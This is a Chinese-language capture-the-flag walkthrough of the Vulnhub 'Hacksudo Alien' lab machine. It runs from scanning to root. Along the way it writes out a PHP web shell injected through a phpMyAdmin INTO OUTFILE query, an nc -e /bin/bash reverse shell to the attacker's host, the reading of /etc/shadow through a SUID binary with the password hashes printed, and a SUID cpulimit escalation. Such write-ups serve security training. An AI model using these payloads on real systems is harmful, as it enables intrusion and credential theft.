Vulnhub之Hacksudo Alien靶机解题过程
Hacksudo Alien
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.80.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.214 08:00:27:3e:9d:6a 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.214
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.214 -oN nmap_full-scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 06:33 EST
Nmap scan report for localhost (192.168.56.214)
Host is up (0.00023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
| 256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_ 256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: phpMyAdmin
MAC Address: 08:00:27:3E:9D:6A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
NMAP扫描结果表明目标主机有3个开放端口22(SSH)、80(HTTP)、9000(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ curl http://192.168.56.214
<!DOCTYPE html>
<html lang="en-us">
<head>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/x-icon" href="favicon.ico">
<link rel="stylesheet" type="text/css" href="style.css">
<title>Hacksudo Alien?</title>
</head>
<body>
<div class="TitleWrapper Title">HACKSUDO Alien Sightings<div class="Hacker"></div></div>
<div class="ContentWrapper">author - vishal waghmare </div>
<meta charset="UTF-8">
<title>Hacksudo:Alien</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="style.css">
</head>
<body >
<div class = "text-danger">
<div class = "jumbotron text-center">
<h1><strong>Aliens R Real - HackSudo</strong></h1>
<h2><em>Alien Sightings Data by vishal waghmare</em></h2>
</div>
</div>
<div class = "text-danger">
<div class = "text-danger">
<div class = "col-md-4" style = "margin-left:-50px">
<div class = "form-group">
<input type = "text" class = "form-control" id = "date_time" placeholder = "Enter Search Date (m/d/yyyy)">
<a id = "search" class = "btn btn-default">Search</a>
</div>
</div>
</div>
<div class = "row">
<div class = "col-md-12" id = "tsizing">
<table class = "table table-striped">
<thead>
<tr>
<th>Date</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th>Shape</th>
<th>Duration</th>
<th id="comment-width">Comments</th>
</tr>
</thead>
<tbody></tbody>
</table>
</div>
</div>
</div>
<script src = "data.js" type = "text/javascript"></script>
<script src = "alien.js" type = "text/javascript"></script>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ nikto -h http://192.168.56.214
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.214
+ Target Hostname: 192.168.56.214
+ Target Port: 80
+ Start Time: 2022-11-23 06:40:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8b1, size: 5bf1f4b58ff9d, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-11-23 06:41:30 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Nikto发现了目录/backup,访问该目录,里面有mysql备份文件
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ mv ~/Downloads/mysql.bak .
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ls
mysql.bak nmap_full-scan
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ cat mysql.bak
#!/bin/bash
# Specify which database is to be backed up
db_name=""
# Set the website which this database relates to
website="localhost"
# Database credentials
user="vishal"
password="hacksudo"
host="localhost"
# How many days would you like to keep files for?
days="30"
######################################################
##### EDITING BELOW MAY CAUSE UNEXPECTED RESULTS #####
######################################################
# Set the date
date=$(date +"%Y%m%d-%H%M")
# Set the location of where backups will be stored
backup_location="/var/backups/mysql"
# Create the directory for the website if it doesn't already exist
mkdir -p ${backup_location}/${website}
# Append the database name with the date to the backup location
backup_full_name="${backup_location}/${website}/${db_name}-${date}.sql"
# Set default file permissions
umask 177
# Dump database into SQL file
mysqldump --lock-tables --user=$user --password=$password --host=$host $db_name > $backup_full_name
# Set a value to be used to find all backups with the same name
find_backup_name="${backup_location}/${website}/${db_name}-*.sql"
# Delete files older than the number of days defined
find $find_backup_name -mtime +$days -type f -delete
该备份文件中有数据库用户名和密码,看能否登录9000端口phpmysql,可以成功登录。顺便看一下,是不是也可以用于SSH登录。
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ssh vishal@192.168.56.214
The authenticity of host '192.168.56.214 (192.168.56.214)' can't be established.
ED25519 key fingerprint is SHA256:XUlS4R9GczG8s3rLmHyLIacottCV5nGnO/wvGzLMtXQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.214' (ED25519) to the list of known hosts.
vishal@192.168.56.214's password:
Permission denied, please try again.
vishal@192.168.56.214's password:
Permission denied, please try again.
vishal@192.168.56.214's password:
看来数据库用户名密码不能用户SSH。
利用phpmyadmin写入webshell
在phpmyadmin SQL中执行:
SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) {system($_GET["cmd"]);} ?> </pre></BODY></HTML>' INTO OUTFILE '/var/www/html/huawen.php'
然后访问80端口(不是9000端口)
然后利用web shell spawn一个shell出来。
输入框输入: nc -e /bin/bash 192.168.56.206 5555
在Kali Linux成功得到了目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.214] 44288
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/var/www/html$
提权
将Linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,然后执行脚本
发现date命令有SUID位
ls -alh /usr/bin/date
---Sr-xr-x 1 root root 107K Feb 28 2019 /usr/bin/date
根据GTFOBINS网站的方法可以读取任何文件,咱们把/shadow文件读取出来
www-data@hacksudo:/tmp$ /usr/bin/date -f /etc/shadow
/usr/bin/date -f /etc/shadow
/usr/bin/date: invalid date 'root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::'
/usr/bin/date: invalid date 'daemon:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'bin:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'sys:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'sync:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'games:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'man:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'lp:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'mail:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'news:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'uucp:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'proxy:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'www-data:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'backup:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'list:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'irc:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'gnats:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'nobody:*:18714:0:99999:7:::'
/usr/bin/date: invalid date '_apt:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-timesync:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-network:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-resolve:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'messagebus:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'tss:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'dnsmasq:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'usbmux:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'rtkit:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'pulse:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'speech-dispatcher:!:18714:0:99999:7:::'
/usr/bin/date: invalid date 'avahi:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'saned:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'colord:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'geoclue:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'hplip:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'Debian-gdm:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-coredump:!!:18714::::::'
/usr/bin/date: invalid date 'sshd:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'mysql:!:18720:0:99999:7:::'
www-data@hacksudo:/tmp$
这样就拿到了root以及hacksudo密码的hash值
利用John工具成功破解除了hacksudo的密码
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ john hacksudo_hash /usr/share/wordlists/rockyou.txt
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
aliens (hacksudo)
1g 0:00:00:01 DONE 2/3 (2022-11-23 07:52) 0.6849g/s 2951p/s 2951c/s 2951C/s rangers..burton
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ssh hacksudo@192.168.56.214
hacksudo@192.168.56.214's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 02:12:24 2021 from 192.168.43.217
hacksudo@hacksudo:~$ id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
hacksudo@hacksudo:~$ sudo -l
[sudo] password for hacksudo:
Sorry, user hacksudo may not run sudo on hacksudo.
hacksudo@hacksudo:~$
hacksudo@hacksudo:~$ find / -perm -4000 -type f 2>/dev/null
/home/hacksudo/Downloads/cpulimit
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
hacksudo@hacksudo:~$
查看GTFOBINS网站的方法,利用cpulimit命令提权
hacksudo@hacksudo:~$ ls
aliens51 Desktop Documents Downloads Music Pictures Public Templates Videos
hacksudo@hacksudo:~$ pwd
/home/hacksudo
hacksudo@hacksudo:~$ cd Downloads/
hacksudo@hacksudo:~/Downloads$ ls
cat chown cpulimit hexdump
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p
Process 22494 detected
# id
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
# cd /root
# ls -alh
total 40K
drwx------ 4 root root 4.0K Apr 4 2021 .
drwxr-xr-x 19 root root 4.0K Apr 3 2021 ..
-rw------- 1 root root 1.7K Apr 3 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 2 root root 4.0K Mar 28 2021 .cache
drwxr-xr-x 3 root root 4.0K Apr 3 2021 .local
-rw------- 1 root root 1.1K Apr 3 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 552 Apr 4 2021 root.txt
-rw-r--r-- 1 root root 227 Apr 3 2021 .wget-hsts
# cat root.txt
_ _ _ _
| | | | __ _ ___| | _____ _ _ __| | ___
| |_| |/ _` |/ __| |/ / __| | | |/ _` |/ _ \
| _ | (_| | (__| <\__ \ |_| | (_| | (_) |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/
_ _ _ ____ __
/ \ | (_) ___ _ __ | ___| / /_
/ _ \ | | |/ _ \ '_ \|___ \| '_ \
/ ___ \| | | __/ | | |___) | (_) |
/_/ \_\_|_|\___|_| |_|____/ \___/
congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}
#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
